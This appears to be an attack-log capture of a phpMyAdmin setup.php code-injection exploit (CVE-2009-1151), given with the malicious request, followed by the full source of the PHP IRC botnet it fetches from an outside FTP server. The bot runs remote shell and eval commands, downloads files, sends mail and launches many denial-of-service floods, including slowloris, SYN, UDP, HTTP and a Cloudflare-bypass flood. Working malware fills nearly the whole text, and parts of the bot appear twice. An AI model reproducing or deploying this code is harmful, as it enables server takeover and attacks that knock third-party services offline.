$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWREAD - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$headers = "GET / HTTP/1.1\r\nHost: {$host}\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\n\r\n";
while (time() - $timei < $time) {
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
while (time() - $timei < $time) {
for ($i = 0; $i < count($fs); $i++) {
if (!$fs[$i]) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
fread($fs[$i], 1);
}
sleep(mt_rand(0.5, 2));
}
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWREAD - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function attack_http($mthd, $server, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Started On : $server!\2]");
$request = "$mthd / HTTP/1.1\r\n";
$request .= "Host: $server\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Accept: *.*\r\n";
$timei = time();
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Finished!\2]");
}
public function attack_post($server, $host, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Started On : $server!\2]");
$request = "POST /" . md5(rand()) . " HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Content-Length: 1000000000\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Accept: *.*\r\n";
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
}
}
fclose($sockfd);
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Finished!\2]");
}
public function doSlow($host, $time) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWLORIS - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$i = 0;
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
$out = "POST / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
$out .= "X-a: " . rand(1, 10000) . "\r\n";
if (@fwrite($fs[$i], $out)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWLORIS - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function syn($host, $port, $time, $delay=1) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SYN - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$socks = array();
while (time() - $timei < $time) {
$numsocks++;
$socks[$numsocks] = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$socks[$numsocks]) continue;
@socket_set_nonblock($socks[$numsocks]);
for ($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SYN - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!! (".$numsocks." socks created)!\2]");
}
public function synflood($host, $port, $delay) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - Syn - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$socks = array();
$numsocks = 0;
$numsocks++;
$socks[$numsocks] = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if(!$socks[$numsocks])
continue;
@socket_set_nonblock($socks[$numsocks]);
for($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
for ($j = 0; $j < $numsocks; $j++) {
if($socks[$j])
@socket_close($socks[$j]);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - Syn - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]: Config - For $host:$port.");
}
public function udpflood($host, $port, $time, $packetsize) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - UDP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$packet = "";
for ($i = 0; $i < $packetsize; $i++) {
$packet .= chr(rand(1, 256));
}
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
while (true) {
fwrite($fp, $packet);
fflush($fp);
if ($i % 100 == 0) {
if($end < time())
break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - UDP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]: " . $env . " MB sent / Average: " . $vel . " MB/s ");
}
public function tcpconn($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - TCP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$end = time() + $time;
$i = 0;
while ($end > time()) {
$fp = fsockopen($host, $port, $dummy, $dummy, 1);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - TCP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]: sent " . $i . " connections to $host:$port.");
}
}
$bot = new pBot;
$bot->start($cfg);
function curl($url, $post=array(), $user_agent="", $deleteCookies=false) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
if ($user_agent) {
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
}
if (!empty($post)) {
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
}
if ($deleteCookies) {
file_put_contents("cookie.txt", "");
}
curl_setopt ($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($ch, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
//$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return $result;
}
function get_between($string,$start,$end) {
$string = " ".$string;
$ini = strpos($string, $start);
if($ini==0) return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
?>
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
95.216.174.175
Dest. port: 80
Time: 17/02/2019 01:50:20
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS24940 Hetzner Online GmbH
Location: Newland, Helsinki (zipcode 00100)
rDNS: static.175.174.216.95.clients.your-server.de
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.
CVE: CVE-2009-1151
Author: Adrian "pagvac" Pastor
Plugin ID: oosheefee1baixeinief5nociu5shohh
POST /phpMyAdmin/scripts/setup.php HTTP/1.1
Content-Length: 241
cookie2: $Version="1"
Host: 21.171.51.29
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://21.171.51.29/phpMyAdmin/scripts/setup.php
cookie: phpMyAdmin=d007a44761984bd2008c50bad4ee5c17
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=d7961c1f90c9e481f0aa6d63b1d8009d&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A32%3A%22ftp%3A%2F%2F51%2E38%2E119%2E192%2Fpub%2Fpbot%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: 2be6db19e83a9cd7b4923319ce60c662
Type: text/x-php
Size: 39364
URL: ftp://51.38.119.192/pub/pbot.php
<?php
$cfg = array(
"server" => "51.38.119.192",
"port" => "6667",
"key" => "",
"prefix" => "Zombie",
"maxrand" => "8",
"chan" => "#exploitation",
"trigger" => ".",
"hostauth" => "ddos"
);
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname = @php_uname();
function whereistmP() {
$uploadtmp = ini_get('upload_tmp_dir');
$uf = getenv('USERPROFILE');
$af = getenv('ALLUSERSPROFILE');
$se = ini_get('session.save_path');
$envtmp = (getenv('TMP')) ? getenv('TMP') : getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))
return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))
return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))
return '/var/tmp';
if(is_dir($uf) && is_writable($uf))
return $uf;
if(is_dir($af) && is_writable($af))
return $af;
if(is_dir($se) && is_writable($se))
return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))
return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))
return $envtmp;
return '.';
}
function srvshelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$n = uniqid('NJ');
$cmd = (empty($_SERVER['ComSpec'])) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
win32_create_service(array(
'service' => $n,
'display' => $n,
'path' => $cmd,
'params' => "/c $command >\"$name\""
));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res = $api->WinExec("cmd.exe /c $command >\"$name\"", 0);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command, $ws) {
$exec = $ws->exec("cmd.exe /c $command");
$so = $exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command) {
$perl = new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec = ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command) {
$exec = $output = '';
$dep[] = array(
'pipe',
'r'
);
$dep[] = array(
'pipe',
'w'
);
if (function_exists('passthru')) {
ob_start();
@passthru($command);
$exec = ob_get_contents();
ob_clean();
ob_end_clean();
} elseif (function_exists('system')) {
$tmp = ob_get_contents();
ob_clean();
@system($command);
$output = ob_get_contents();
ob_clean();
$exec = $tmp;
} elseif (function_exists('exec')) {
@exec($command, $output);
$output = join("\n", $output);
$exec = $output;
} elseif(function_exists('shell_exec'))
$exec = @shell_exec($command);
elseif (function_exists('popen')) {
$output = @popen($command, 'r');
while (!feof($output)) {
$exec = fgets($output);
}
pclose($output);
} elseif (function_exists('proc_open')) {
$res = @proc_open($command, $dep, $pipes);
while (!feof($pipes[1])) {
$line = fgets($pipes[1]);
$output .= $line;
}
$exec = $output;
proc_close($res);
} elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = ffishelL($command);
elseif(extension_loaded('perl'))
$exec = perlshelL($command);
return $exec;
}
class pBot {
public $config = '';
public $user_agents = array(
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00"
);
public $charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
public $users = array();
public function start($cfg) {
$this->config = $cfg;
while (true) {
if(!($this->conn = fsockopen($this->config['server'], $this->config['port'], $e, $s, 30)))
$this->start($cfg);
$ident = $this->config['prefix'];
$alph = range("0", "9");
for($i = 0; $i < $this->config['maxrand']; $i++)
$ident .= $alph[rand(0, 9)];
$this->send("USER " . $ident . " 127.0.0.1 localhost :" . php_uname() . "");
$this->set_nick();
$this->main();
}
}
public function main() {
while (!feof($this->conn)) {
if (function_exists('stream_select')) {
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if ($changed == 0) {
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
break;
}
}
$this->buf = trim(fgets($this->conn, 512));
$cmd = explode(" ", $this->buf);
if (substr($this->buf, 0, 6) == "PING :") {
$this->send("PONG :" . substr($this->buf, 6));
continue;
}
if (isset($cmd[1]) && $cmd[1] == "001") {
$this->join($this->config['chan'], $this->config['key']);
continue;
}
if (isset($cmd[1]) && $cmd[1] == "433") {
$this->set_nick();
continue;
}
if ($this->buf != $old_buf) {
$mcmd = array();
$msg = substr(strstr($this->buf, " :"), 2);
$msgcmd = explode(" ", $msg);
$nick = explode("!", $cmd[0]);
$vhost = explode("@", $nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0], 1);
$host = $cmd[0];
if($msgcmd[0] == $this->nick)
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i + 1];
else
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i];
if (count($cmd) > 2) {
switch ($cmd[1]) {
case "PRIVMSG":
if ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*") {
if (substr($mcmd[0], 0, 1) == ".") {
switch (substr($mcmd[0], 1)) {
case "mail":
if (count($mcmd) > 4) {
$header = "From: <" . $mcmd[2] . ">";
if (!mail($mcmd[1], $mcmd[3], strstr($msg, $mcmd[4]), $header)) {
$this->privmsg($this->config['chan'], "[\2mail\2]: failed sending.");
} else {
$this->privmsg($this->config['chan'], "[\2mail\2]: sent.");
}
}
break;
case "dns":
if (isset($mcmd[1])) {
$ip = explode(".", $mcmd[1]);
if (count($ip) == 4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyaddr($mcmd[1]));
} else {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyname($mcmd[1]));
}
}
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = "on";
} else {
$safemode = "off";
}
$uname = php_uname();
$this->privmsg($this->config['chan'], "[\2info\2]: " . $uname . " (safe: " . $safemode . ")");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg, $mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg, $mcmd[1]));
$exec = ob_get_contents();
ob_end_clean();
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "cmd":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = Exe($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "ud.server":
if (count($mcmd) > 2) {
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if (isset($mcmcd[3])) {
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'], "[\2update\2]: info updated " . $mcmd[1] . ":" . $mcmd[2] . " pass: " . $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "[\2update\2]: switched server to " . $mcmd[1] . ":" . $mcmd[2]);
}
fclose($this->conn);
}
break;
case "download":
if (count($mcmd) > 2) {
if (!$fp = fopen($mcmd[2], "w")) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not open output file.");
} else {
if (!$get = file($mcmd[1])) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not download \2" . $mcmd[1] . "\2");
} else {
for ($i = 0; $i <= count($get); $i++) {
fwrite($fp, $get[$i]);
}
$this->privmsg($this->config['chan'], "[\2download\2]: file \2" . $mcmd[1] . "\2 downloaded to \2" . $mcmd[2] . "\2");
}
fclose($fp);
}
} else {
$this->privmsg($this->config['chan'], "[\2download\2]: use .download http://your.host/file /tmp/file");
}
break;
case "udpflood":
if (count($mcmd) > 4) {
$this->udpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
}
break;
case "tcpconn":
if (count($mcmd) > 5) {
$this->tcpconn($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "rudy":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "slowread":
if (count($mcmd) > 3) {
$this->slowRead($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "slowloris":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "synflood":
if (count($mcmd) > 3) {
$this->synflood($mcmd[1], $mcmd[2], $mcmd[3]);
}
case "l7":
if (count($mcmd) > 3) {
if ($mcmd[1] == "get") {
$this->attack_http("GET", $mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "post") {
$this->attack_post($mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "head") {
$this->attack_http("HEAD", $mcmd[2], $mcmd[3]);
}
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "tcpflood":
if (count($mcmd) > 2) {
$this->tcpflood($mcmd[1], $mcmd[2], $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: tcpflood host port time");
}
break;
case "httpflood":
if (count($mcmd) > 2) {
$this->httpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5]);
} else {
$this->privmsg($this->config['chan'], "syntax: httpflood host port time [method] [url]");
}
break;
case "proxyhttpflood":
if (count($mcmd) > 2) {
$this->proxyhttpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: proxyhttpflood targetUrl(with http://) proxyListUrl time [method]");
}
break;
case "cloudflareflood":
print_r($mcmd);
if (count($mcmd) > 2) {
$this->cloudflareflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5], $mcmd[6]);
} else {
$this->privmsg($this->config['chan'], "syntax: cloudflareflood host port time [method] [url] [postFields]");
}
break;
}
}
}
break;
}
}
}
}
}
public function send($msg) {
fwrite($this->conn, $msg . "\r\n");
}
public function join($chan, $key = NULL) {
$this->send("JOIN " . $chan . " " . $key);
}
public function privmsg($to, $msg) {
$this->send("PRIVMSG " . $to . " :" . $msg);
}
public function notice($to, $msg) {
$this->send("NOTICE " . $to . " :" . $msg);
}
public function set_nick() {
$fp = fsockopen("freegeoip.net", 80, $dummy, $dummy, 30);
if(!$fp)
$this->nick = "";
else {
fclose($fp);
$ctx = stream_context_create(array(
'http' => array(
'timeout' => 30
)
));
$buf = file_get_contents("http://freegeoip.net/json/", 0, $ctx);
if(!strstr($buf, "country_code"))
$this->nick = "";
else {
$code = strstr($buf, "country_code");
$code = substr($code, 12);
$code = substr($code, 3, 2);
$this->nick = "[" . $code . "]";
}
}
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$this->nick .= "[WIN32]";
else
$this->nick .= "[LINUX]";
if (isset($_SERVER['SERVER_SOFTWARE'])) {
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "apache"))
$this->nick .= "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "iis"))
$this->nick .= "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "xitami"))
$this->nick .= "[X]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "nginx"))
$this->nick .= "[N]";
else
$this->nick .= "[U]";
} else {
$this->nick .= "[C]";
}
$this->nick .= $this->config['prefix'];
for($i = 0; $i < $this->config['maxrand']; $i++)
$this->nick .= mt_rand(0, 9);
$this->send("NICK " . $this->nick);
}
public function cloudflareflood($host, $port, $time, $method="GET", $url="/", $post=array()) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - CloudFlare - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n";
//Cloudflare Bypass
$res = curl($host, null, $user_agent, true);
//Cloudflare Bypass
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare detected!...\2]");
//Get the math calc
$math_calc = get_between($res, "a.value = ", ";");
if ($math_calc) {
$math_result = (int) eval("return ($math_calc);");
if (is_numeric($math_result)) {
$math_result += strlen($host); //Domain lenght
//Send the CloudFlare's form
$getData = "cdn-cgi/l/chk_jschl";
$getData .= "?jschl_vc=".get_between($res, 'name="jschl_vc" value="', '"');
$getData .= "&jschl_answer=".$math_result;
$res = curl($host.$getData, null, $user_agent);
//Cloudflare Bypassed?
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare not bypassed...\2]");
return false;
} else {
$bypassed = true;
//Cookie read
$cookie = trim(get_between(file_get_contents("cookie.txt"), "__cfduid", "\n"));
$packet .= "Cookie: __cfduid=".$cookie."\r\n\r\n";
}
}
}
} else {
$this->privmsg($this->config['chan'], "[\2CloudFlare not detected...\2]");
}
if ($bypassed) {
$this->privmsg($this->config['chan'], "[\2CloudFlare bypassed!\2]");
}
$this->privmsg($this->config['chan'], "[\2Flodding...\2]");
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - CloudFlare - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function httpflood($host, $port, $time, $method="GET", $url="/") {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - HTTP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - HTTP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function proxyhttpflood($url, $proxyListUrl, $time, $method="GET") {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - PROXYHTTP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
//Grabbing proxy
$proxyList = curl($proxyListUrl);
if ($proxyList) {
$proxies = explode("\n", $proxyList);
if (count($proxies)) {
shuffle($proxies);
$proxies[0] = trim($proxies[0]);
$proxy = explode(":", $proxies[0]);
$proxyIp = $proxy[0];
$proxyPort = $proxy[1];
if ($proxyPort && $proxyIp) {
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($proxyIp, $proxyPort, $errno, $errstr, 1);
fwrite($handle, $packet);
}
} else {
$this->privmsg($this->config['chan'], "[\2Malformed proxy!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2No proxies found!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2Proxy List not found!\2]");
}
$this->privmsg($this->config['chan'], "[\2IRC TERRORIST - HTTP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!! (Proxy: ".$proxies[0].")!\2]");
}
public function tcpflood($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2IRC TERRORIST - TCP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$packet = "";
for ($i = 0; $i < 65000; $i++) {
$packet .= $this->charset[rand(0, strlen($this->charset))];
}
while (time() - $timei < $time) {
$handle = fsockopen("tcp://".$host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2IRC TERRORIST - TCP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function slowRead($host, $port, $time) {
$timei = time();
$fs = array();
//initialize get headers.
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWREAD - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$headers = "GET / HTTP/1.1\r\nHost: {$host}\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\n\r\n";
while (time() - $timei < $time) {
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
while (time() - $timei < $time) {
for ($i = 0; $i < count($fs); $i++) {
if (!$fs[$i]) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
fread($fs[$i], 1);
}
sleep(mt_rand(0.5, 2));
}
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWREAD - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function attack_http($mthd, $server, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Started On : $server!\2]");
